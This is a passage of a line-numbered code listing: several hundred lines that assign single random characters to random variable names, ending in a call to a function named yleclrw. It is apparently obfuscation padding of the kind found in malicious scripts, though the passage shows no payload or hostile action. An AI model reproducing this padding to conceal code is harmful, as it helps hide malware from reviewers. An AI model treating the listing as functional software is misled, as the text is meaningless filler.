743 | eokfcegyw = "t"; | |
744 | eokfcegyw = "t"; | |
745 | eokfcegyw = "t"; | |
746 | eokfcegyw = "c"; | |
747 | eokfcegyw = "V"; | |
748 | eokfcegyw = "k"; | |
749 | eokfcegyw = "a"; | |
750 | eokfcegyw = "D"; | |
751 | eokfcegyw = "T"; | |
752 | eokfcegyw = "Y"; | |
753 | eokfcegyw = "B"; | |
754 | eokfcegyw = "K"; | |
755 | eokfcegyw = "Q"; | |
756 | eokfcegyw = "R"; | |
757 | eokfcegyw = "S"; | |
758 | eokfcegyw = "j"; | |
759 | eokfcegyw = "F"; | |
760 | eokfcegyw = "N"; | |
761 | eokfcegyw = "M"; | |
762 | eokfcegyw = "v"; | |
763 | eokfcegyw = "b"; | |
764 | eokfcegyw = "z"; | |
765 | eokfcegyw = "X"; | |
766 | eokfcegyw = "i"; | |
767 | eokfcegyw = "F"; | |
768 | eokfcegyw = "O"; | |
769 | eokfcegyw = "o"; | |
770 | ggjgiyphs = "R"; | |
771 | ggjgiyphs = "N"; | |
772 | ggjgiyphs = "p"; | |
773 | ggjgiyphs = "D"; | |
774 | ggjgiyphs = "J"; | |
775 | ggjgiyphs = "K"; | |
776 | ggjgiyphs = "j"; | |
777 | ggjgiyphs = "i"; | |
778 | ggjgiyphs = "F"; | |
779 | ggjgiyphs = "R"; | |
780 | ggjgiyphs = "w"; | |
781 | ggjgiyphs = "g"; | |
782 | ggjgiyphs = "M"; | |
783 | ggjgiyphs = "p"; | |
784 | ggjgiyphs = "r"; | |
785 | ggjgiyphs = "g"; | |
786 | ggjgiyphs = "g"; | |
787 | ggjgiyphs = "k"; | |
788 | ggjgiyphs = "u"; | |
789 | ggjgiyphs = "i"; | |
790 | ggjgiyphs = "r"; | |
791 | ggjgiyphs = "N"; | |
792 | ggjgiyphs = "u"; | |
793 | ggjgiyphs = "g"; | |
794 | ggjgiyphs = "C"; | |
795 | ggjgiyphs = "m"; | |
796 | ggjgiyphs = "q"; | |
797 | ggjgiyphs = "t"; | |
798 | ggjgiyphs = "k"; | |
799 | ggjgiyphs = "D"; | |
800 | ggjgiyphs = "O"; | |
801 | ggjgiyphs = "n"; | |
802 | ggjgiyphs = "z"; | |
803 | ggjgiyphs = "K"; | |
804 | ggjgiyphs = "b"; | |
805 | ggjgiyphs = "I"; | |
806 | ggjgiyphs = "G"; | |
807 | ggjgiyphs = "w"; | |
808 | ggjgiyphs = "u"; | |
809 | ggjgiyphs = "N"; | |
810 | ggjgiyphs = "q"; | |
811 | ggjgiyphs = "C"; | |
812 | ggjgiyphs = "-"; | |
813 | whaxo = "n"; | |
814 | whaxo = "v"; | |
815 | whaxo = "l"; | |
816 | whaxo = "L"; | |
817 | whaxo = "P"; | |
818 | whaxo = "h"; | |
819 | whaxo = "P"; | |
820 | whaxo = "y"; | |
821 | whaxo = "p"; | |
822 | whaxo = "X"; | |
823 | whaxo = "r"; | |
824 | whaxo = "q"; | |
825 | whaxo = "x"; | |
826 | whaxo = "L"; | |
827 | whaxo = "W"; | |
828 | whaxo = "s"; | |
829 | whaxo = "u"; | |
830 | whaxo = "R"; | |
831 | whaxo = "T"; | |
832 | whaxo = "x"; | |
833 | whaxo = "m"; | |
834 | whaxo = "9"; | |
835 | jxhut = "d"; | |
836 | jxhut = "B"; | |
837 | jxhut = "O"; | |
838 | jxhut = "z"; | |
839 | jxhut = "f"; | |
840 | jxhut = "e"; | |
841 | jxhut = "z"; | |
842 | jxhut = "S"; | |
843 | jxhut = "x"; | |
844 | jxhut = "y"; | |
845 | jxhut = "q"; | |
846 | jxhut = "X"; | |
847 | jxhut = "l"; | |
848 | jxhut = "d"; | |
849 | jxhut = "N"; | |
850 | jxhut = "D"; | |
851 | jxhut = "h"; | |
852 | jxhut = "p"; | |
853 | jxhut = "D"; | |
854 | jxhut = "J"; | |
855 | jxhut = "f"; | |
856 | jxhut = "f"; | |
857 | jxhut = "i"; | |
858 | jxhut = "e"; | |
859 | jxhut = "F"; | |
860 | jxhut = "p"; | |
861 | jxhut = "b"; | |
862 | jxhut = "i"; | |
863 | jxhut = "L"; | |
864 | gqlwyz = "Y"; | |
865 | gqlwyz = "z"; | |
866 | gqlwyz = "q"; | |
867 | gqlwyz = "A"; | |
868 | gqlwyz = "B"; | |
869 | gqlwyz = "r"; | |
870 | gqlwyz = "N"; | |
871 | gqlwyz = "E"; | |
872 | gqlwyz = "m"; | |
873 | gqlwyz = "s"; | |
874 | gqlwyz = "d"; | |
875 | gqlwyz = "J"; | |
876 | gqlwyz = "M"; | |
877 | gqlwyz = "G"; | |
878 | gqlwyz = "e"; | |
879 | gqlwyz = "R"; | |
880 | gqlwyz = "D"; | |
881 | gqlwyz = "o"; | |
882 | gqlwyz = "i"; | |
883 | gqlwyz = "b"; | |
884 | gqlwyz = "R"; | |
885 | gqlwyz = "L"; | |
886 | gqlwyz = "p"; | |
887 | gqlwyz = "c"; | |
888 | gqlwyz = "v"; | |
889 | gqlwyz = "P"; | |
890 | gqlwyz = "R"; | |
891 | gqlwyz = "d"; | |
892 | gqlwyz = "C"; | |
893 | gqlwyz = "b"; | |
894 | gqlwyz = "u"; | |
895 | gqlwyz = "v"; | |
896 | gqlwyz = "F"; | |
897 | gqlwyz = "Y"; | |
898 | gqlwyz = "C"; | |
899 | gqlwyz = "w"; | |
900 | gqlwyz = "Y"; | |
901 | gqlwyz = "h"; | |
902 | gqlwyz = "O"; | |
903 | gqlwyz = "P"; | |
904 | gqlwyz = "r"; | |
905 | gqlwyz = "T"; | |
906 | gqlwyz = "U"; | |
907 | gqlwyz = "t"; | |
908 | gqlwyz = "v"; | |
909 | hqksuoirx = "y"; | |
910 | hqksuoirx = "o"; | |
911 | hqksuoirx = "H"; | |
912 | hqksuoirx = "K"; | |
913 | hqksuoirx = "X"; | |
914 | hqksuoirx = "c"; | |
915 | hqksuoirx = "W"; | |
916 | hqksuoirx = "c"; | |
917 | hqksuoirx = "u"; | |
918 | hqksuoirx = "G"; | |
919 | hqksuoirx = "L"; | |
920 | hqksuoirx = "T"; | |
921 | hqksuoirx = "O"; | |
922 | hqksuoirx = "g"; | |
923 | hqksuoirx = "P"; | |
924 | hqksuoirx = "G"; | |
925 | hqksuoirx = "v"; | |
926 | hqksuoirx = "v"; | |
927 | hqksuoirx = "C"; | |
928 | hqksuoirx = "y"; | |
929 | hqksuoirx = "z"; | |
930 | hqksuoirx = "G"; | |
931 | hqksuoirx = "P"; | |
932 | hqksuoirx = "W"; | |
933 | hqksuoirx = "A"; | |
934 | hqksuoirx = "b"; | |
935 | iuftm = "W"; | |
936 | iuftm = "S"; | |
937 | iuftm = "u"; | |
938 | iuftm = "A"; | |
939 | iuftm = "J"; | |
940 | iuftm = "m"; | |
941 | iuftm = "X"; | |
942 | iuftm = "o"; | |
943 | iuftm = "B"; | |
944 | iuftm = "x"; | |
945 | iuftm = "e"; | |
946 | iuftm = "X"; | |
947 | iuftm = "H"; | |
948 | iuftm = "c"; | |
949 | iuftm = "E"; | |
950 | iuftm = "S"; | |
951 | oflhnueo = "S"; | |
952 | oflhnueo = "N"; | |
953 | oflhnueo = "d"; | |
954 | oflhnueo = "d"; | |
955 | oflhnueo = "Q"; | |
956 | oflhnueo = "a"; | |
957 | oflhnueo = "y"; | |
958 | oflhnueo = "m"; | |
959 | oflhnueo = "o"; | |
960 | oflhnueo = "P"; | |
961 | oflhnueo = "b"; | |
962 | oflhnueo = "Q"; | |
963 | oflhnueo = "M"; | |
964 | oflhnueo = "k"; | |
965 | oflhnueo = "P"; | |
966 | oflhnueo = "F"; | |
967 | oflhnueo = "W"; | |
968 | oflhnueo = "d"; | |
969 | oflhnueo = "B"; | |
970 | oflhnueo = "s"; | |
971 | oflhnueo = "v"; | |
972 | oflhnueo = "m"; | |
973 | oflhnueo = "p"; | |
974 | oflhnueo = "e"; | |
975 | oflhnueo = "X"; | |
976 | oflhnueo = "p"; | |
977 | oflhnueo = "M"; | |
978 | oflhnueo = "Y"; | |
979 | oflhnueo = "C"; | |
980 | oflhnueo = "U"; | |
981 | oflhnueo = "m"; | |
982 | oflhnueo = "S"; | |
983 | oflhnueo = "o"; | |
984 | oflhnueo = "o"; | |
985 | oflhnueo = "U"; | |
986 | oflhnueo = "F"; | |
987 | oflhnueo = "g"; | |
988 | oflhnueo = "C"; | |
989 | oflhnueo = "G"; | |
990 | oflhnueo = "S"; | |
991 | oflhnueo = "D"; | |
992 | oflhnueo = "Z"; | |
993 | oflhnueo = "e"; | |
994 | gfxsv = "F"; | |
995 | gfxsv = "G"; | |
996 | gfxsv = "A"; | |
997 | gfxsv = "j"; | |
998 | gfxsv = "A"; | |
999 | gfxsv = "r"; | |
1000 | gfxsv = "I"; | |
1001 | gfxsv = "I"; | |
1002 | gfxsv = "g"; | |
1003 | gfxsv = "p"; | |
1004 | quuyzwhd = "d"; | |
1005 | quuyzwhd = "m"; | |
1006 | quuyzwhd = "H"; | |
1007 | quuyzwhd = "Q"; | |
1008 | quuyzwhd = "N"; | |
1009 | quuyzwhd = "a"; | |
1010 | quuyzwhd = "M"; | |
1011 | quuyzwhd = "X"; | |
1012 | quuyzwhd = "c"; | |
1013 | quuyzwhd = "j"; | |
1014 | quuyzwhd = "G"; | |
1015 | quuyzwhd = "l"; | |
1016 | quuyzwhd = "M"; | |
1017 | quuyzwhd = "\\"; | |
1018 | israkc = "E"; | |
1019 | israkc = "H"; | |
1020 | israkc = "T"; | |
1021 | israkc = "b"; | |
1022 | israkc = "s"; | |
1023 | israkc = "o"; | |
1024 | israkc = "d"; | |
1025 | israkc = "C"; | |
1026 | israkc = "K"; | |
1027 | israkc = "G"; | |
1028 | israkc = "a"; | |
1029 | israkc = "t"; | |
1030 | israkc = "S"; | |
1031 | israkc = "y"; | |
1032 | israkc = "L"; | |
1033 | israkc = "M"; | |
1034 | israkc = "W"; | |
1035 | israkc = "j"; | |
1036 | israkc = "S"; | |
1037 | israkc = "D"; | |
1038 | israkc = "p"; | |
1039 | israkc = "Y"; | |
1040 | israkc = "Q"; | |
1041 | israkc = "n"; | |
1042 | israkc = "q"; | |
1043 | israkc = "w"; | |
1044 | israkc = "B"; | |
1045 | israkc = "N"; | |
1046 | israkc = "a"; | |
1047 | israkc = "u"; | |
1048 | israkc = "m"; | |
1049 | israkc = "c"; | |
1050 | israkc = "q"; | |
1051 | israkc = "v"; | |
1052 | israkc = "f"; | |
1053 | israkc = "S"; | |
1054 | israkc = "Y"; | |
1055 | israkc = "Y"; | |
1056 | israkc = "Q"; | |
1057 | israkc = "o"; | |
1058 | israkc = "l"; | |
1059 | israkc = "P"; | |
1060 | israkc = "_"; | |
1061 | fkwzhhia = "C"; | |
1062 | fkwzhhia = "A"; | |
1063 | fkwzhhia = "U"; | |
1064 | fkwzhhia = "F"; | |
1065 | fkwzhhia = "Q"; | |
1066 | fkwzhhia = "B"; | |
1067 | fkwzhhia = "W"; | |
1068 | fkwzhhia = "b"; | |
1069 | fkwzhhia = "b"; | |
1070 | fkwzhhia = "t"; | |
1071 | fkwzhhia = "d"; | |
1072 | fkwzhhia = "v"; | |
1073 | fkwzhhia = "v"; | |
1074 | fkwzhhia = "U"; | |
1075 | fkwzhhia = "S"; | |
1076 | fkwzhhia = "x"; | |
1077 | fkwzhhia = "W"; | |
1078 | fkwzhhia = "R"; | |
1079 | fkwzhhia = "j"; | |
1080 | fkwzhhia = "H"; | |
1081 | fkwzhhia = "n"; | |
1082 | fkwzhhia = "c"; | |
1083 | fkwzhhia = "s"; | |
1084 | fkwzhhia = "X"; | |
1085 | fkwzhhia = "T"; | |
1086 | fkwzhhia = "o"; | |
1087 | fkwzhhia = "E"; | |
1088 | fkwzhhia = "K"; | |
1089 | fkwzhhia = "H"; | |
1090 | fkwzhhia = "d"; | |
1091 | fkwzhhia = "u"; | |
1092 | fkwzhhia = "Q"; | |
1093 | fkwzhhia = "i"; | |
1094 | fkwzhhia = "k"; | |
1095 | fkwzhhia = "4"; | |
1096 | vijyhep = "V"; | |
1097 | vijyhep = "J"; | |
1098 | vijyhep = "i"; | |
1099 | vijyhep = "I"; | |
1100 | vijyhep = "t"; | |
1101 | vijyhep = "X"; | |
1102 | vijyhep = "b"; | |
1103 | vijyhep = "q"; | |
1104 | vijyhep = "n"; | |
1105 | vijyhep = "j"; | |
1106 | olfeeclzn = "e"; | |
1107 | olfeeclzn = "l"; | |
1108 | klfyr = "t"; | |
1109 | klfyr = "h"; | |
1110 | klfyr = "c"; | |
1111 | klfyr = "R"; | |
1112 | klfyr = "O"; | |
1113 | klfyr = "S"; | |
1114 | klfyr = "U"; | |
1115 | klfyr = "m"; | |
1116 | klfyr = "s"; | |
1117 | klfyr = "q"; | |
1118 | klfyr = "E"; | |
1119 | klfyr = "t"; | |
1120 | klfyr = "P"; | |
1121 | klfyr = "d"; | |
1122 | klfyr = "S"; | |
1123 | klfyr = "Y"; | |
1124 | klfyr = "s"; | |
1125 | klfyr = "P"; | |
1126 | klfyr = "b"; | |
1127 | klfyr = "H"; | |
1128 | klfyr = "O"; | |
1129 | klfyr = "x"; | |
1130 | klfyr = "W"; | |
1131 | klfyr = "x"; | |
1132 | klfyr = "z"; | |
1133 | klfyr = "u"; | |
1134 | klfyr = "X"; | |
1135 | klfyr = "H"; | |
1136 | klfyr = "X"; | |
1137 | klfyr = "h"; | |
1138 | klfyr = "X"; | |
1139 | klfyr = "W"; | |
1140 | klfyr = "j"; | |
1141 | klfyr = "i"; | |
1142 | klfyr = "h"; | |
1143 | klfyr = "k"; | |
1144 | ufckipkxe = "V"; | |
1145 | ufckipkxe = "P"; | |
1146 | ufckipkxe = "L"; | |
1147 | ufckipkxe = "k"; | |
1148 | ufckipkxe = "S"; | |
1149 | ufckipkxe = "Z"; | |
1150 | ufckipkxe = "M"; | |
1151 | ufckipkxe = "O"; | |
1152 | ufckipkxe = "T"; | |
1153 | ptytd = "H"; | |
1154 | ptytd = "j"; | |
1155 | ptytd = "n"; | |
1156 | ptytd = "O"; | |
1157 | ptytd = "m"; | |
1158 | ptytd = "n"; | |
1159 | ptytd = "Q"; | |
1160 | ptytd = "R"; | |
1161 | ptytd = "A"; | |
1162 | ptytd = "S"; | |
1163 | ptytd = "a"; | |
1164 | ptytd = "U"; | |
1165 | ptytd = "h"; | |
1166 | ptytd = "N"; | |
1167 | ptytd = "A"; | |
1168 | ptytd = "l"; | |
1169 | ptytd = "V"; | |
1170 | ptytd = "P"; | |
1171 | ptytd = "G"; | |
1172 | ptytd = "B"; | |
1173 | ptytd = "u"; | |
1174 | ptytd = "D"; | |
1175 | ptytd = "y"; | |
1176 | ptytd = "q"; | |
1177 | ptytd = "k"; | |
1178 | ptytd = "K"; | |
1179 | ptytd = "E"; | |
1180 | ptytd = "v"; | |
1181 | ptytd = "Q"; | |
1182 | ptytd = "n"; | |
1183 | ptytd = "I"; | |
1184 | ptytd = "U"; | |
1185 | ptytd = "L"; | |
1186 | ptytd = "R"; | |
1187 | ptytd = "k"; | |
1188 | ptytd = "p"; | |
1189 | ptytd = "h"; | |
1190 | ptytd = "b"; | |
1191 | ptytd = "H"; | |
1192 | lxlhec = "P"; | |
1193 | lxlhec = "n"; | |
1194 | lxlhec = "h"; | |
1195 | lxlhec = "x"; | |
1196 | lxlhec = "P"; | |
1197 | lxlhec = "w"; | |
1198 | lxlhec = "a"; | |
1199 | lxlhec = "p"; | |
1200 | lxlhec = "J"; | |
1201 | lxlhec = "O"; | |
1202 | lxlhec = "a"; | |
1203 | lxlhec = "K"; | |
1204 | lxlhec = "q"; | |
1205 | lxlhec = "g"; | |
1206 | lxlhec = "G"; | |
1207 | lxlhec = "S"; | |
1208 | lxlhec = "n"; | |
1209 | lxlhec = "B"; | |
1210 | lxlhec = "J"; | |
1211 | lxlhec = "s"; | |
1212 | lxlhec = "Z"; | |
1213 | lxlhec = "w"; | |
1214 | lxlhec = "M"; | |
1215 | lxlhec = "i"; | |
1216 | lxlhec = "Y"; | |
1217 | lxlhec = "J"; | |
1218 | lxlhec = "v"; | |
1219 | lxlhec = "f"; | |
1220 | lxlhec = "M"; | |
1221 | lxlhec = "s"; | |
1222 | lxlhec = "l"; | |
1223 | lxlhec = "n"; | |
1224 | lxlhec = "f"; | |
1225 | lxlhec = "g"; | |
1226 | lxlhec = "G"; | |
1227 | lxlhec = "X"; | |
1228 | lxlhec = "C"; | |
1229 | lxlhec = "A"; | |
1230 | lxlhec = "S"; | |
1231 | lxlhec = "w"; | |
1232 | pshajy = "Y"; | |
1233 | pshajy = "a"; | |
1234 | pshajy = "L"; | |
1235 | pshajy = "N"; | |
1236 | pshajy = "r"; | |
1237 | pshajy = "D"; | |
1238 | pshajy = "W"; | |
1239 | pshajy = "t"; | |
1240 | pshajy = "W"; | |
1241 | pshajy = "H"; | |
1242 | pshajy = "k"; | |
1243 | pshajy = "H"; | |
1244 | pshajy = "X"; | |
1245 | pshajy = "l"; | |
1246 | pshajy = "i"; | |
1247 | pshajy = "L"; | |
1248 | pshajy = "M"; | |
1249 | pshajy = "K"; | |
1250 | pshajy = "Y"; | |
1251 | pshajy = "k"; | |
1252 | pshajy = "n"; | |
1253 | pshajy = "x"; | |
1254 | pshajy = "o"; | |
1255 | pshajy = "V"; | |
1256 | pshajy = "i"; | |
1257 | pshajy = "P"; | |
1258 | pshajy = "G"; | |
1259 | pshajy = "e"; | |
1260 | pshajy = "o"; | |
1261 | pshajy = "N"; | |
1262 | iebrficqq = "S"; | |
1263 | iebrficqq = "U"; | |
1264 | iebrficqq = "i"; | |
1265 | iebrficqq = "Q"; | |
1266 | iebrficqq = "g"; | |
1267 | iebrficqq = "d"; | |
1268 | iebrficqq = "S"; | |
1269 | iebrficqq = "B"; | |
1270 | iebrficqq = "J"; | |
1271 | iebrficqq = "b"; | |
1272 | iebrficqq = "O"; | |
1273 | iebrficqq = "V"; | |
1274 | iebrficqq = "W"; | |
1275 | iebrficqq = "h"; | |
1276 | iebrficqq = "t"; | |
1277 | yygnd = "Z"; | |
1278 | yygnd = "p"; | |
1279 | yygnd = "D"; | |
1280 | yygnd = "S"; | |
1281 | yygnd = "u"; | |
1282 | yygnd = "T"; | |
1283 | yygnd = "A"; | |
1284 | yygnd = "Q"; | |
1285 | yygnd = "I"; | |
1286 | yygnd = "v"; | |
1287 | yygnd = "J"; | |
1288 | yygnd = "T"; | |
1289 | yygnd = "L"; | |
1290 | yygnd = "W"; | |
1291 | yygnd = "z"; | |
1292 | yygnd = "I"; | |
1293 | yygnd = "Y"; | |
1294 | yygnd = "e"; | |
1295 | yygnd = "p"; | |
1296 | yygnd = "v"; | |
1297 | yygnd = "P"; | |
1298 | yygnd = "F"; | |
1299 | yygnd = "b"; | |
1300 | yygnd = "Q"; | |
1301 | yygnd = "Q"; | |
1302 | yygnd = "P"; | |
1303 | yygnd = "g"; | |
1304 | yygnd = "L"; | |
1305 | yygnd = "O"; | |
1306 | yygnd = "0"; | |
1307 | llgqauf = "N"; | |
1308 | llgqauf = "p"; | |
1309 | llgqauf = "x"; | |
1310 | llgqauf = "e"; | |
1311 | llgqauf = "g"; | |
1312 | llgqauf = "y"; | |
1313 | llgqauf = "w"; | |
1314 | llgqauf = "y"; | |
1315 | llgqauf = "A"; | |
1316 | llgqauf = "r"; | |
1317 | llgqauf = "V"; | |
1318 | llgqauf = "K"; | |
1319 | llgqauf = "R"; | |
1320 | llgqauf = "h"; | |
1321 | llgqauf = "a"; | |
1322 | llgqauf = "k"; | |
1323 | llgqauf = "T"; | |
1324 | llgqauf = "x"; | |
1325 | llgqauf = "j"; | |
1326 | llgqauf = "P"; | |
1327 | llgqauf = "z"; | |
1328 | llgqauf = "p"; | |
1329 | llgqauf = "o"; | |
1330 | llgqauf = "u"; | |
1331 | llgqauf = "q"; | |
1332 | llgqauf = "W"; | |
1333 | llgqauf = "z"; | |
1334 | llgqauf = "T"; | |
1335 | llgqauf = "H"; | |
1336 | llgqauf = "u"; | |
1337 | wkhdndyfx = "m"; | |
1338 | wkhdndyfx = "i"; | |
1339 | wkhdndyfx = "V"; | |
1340 | wkhdndyfx = "x"; | |
1341 | rrsnl = "j"; | |
1342 | rrsnl = "N"; | |
1343 | rrsnl = "K"; | |
1344 | rrsnl = "Q"; | |
1345 | rrsnl = "O"; | |
1346 | rrsnl = "g"; | |
1347 | rrsnl = "N"; | |
1348 | rrsnl = "p"; | |
1349 | rrsnl = "k"; | |
1350 | rrsnl = "M"; | |
1351 | rrsnl = "S"; | |
1352 | rrsnl = "l"; | |
1353 | rrsnl = "v"; | |
1354 | rrsnl = "Q"; | |
1355 | fuglr = "u"; | |
1356 | fuglr = "G"; | |
1357 | fuglr = "n"; | |
1358 | fuglr = "v"; | |
1359 | fuglr = "P"; | |
1360 | fuglr = "W"; | |
1361 | fuglr = "h"; | |
1362 | fuglr = "m"; | |
1363 | fuglr = "w"; | |
1364 | fuglr = "%"; | |
1365 | yleclrw ( ); |
|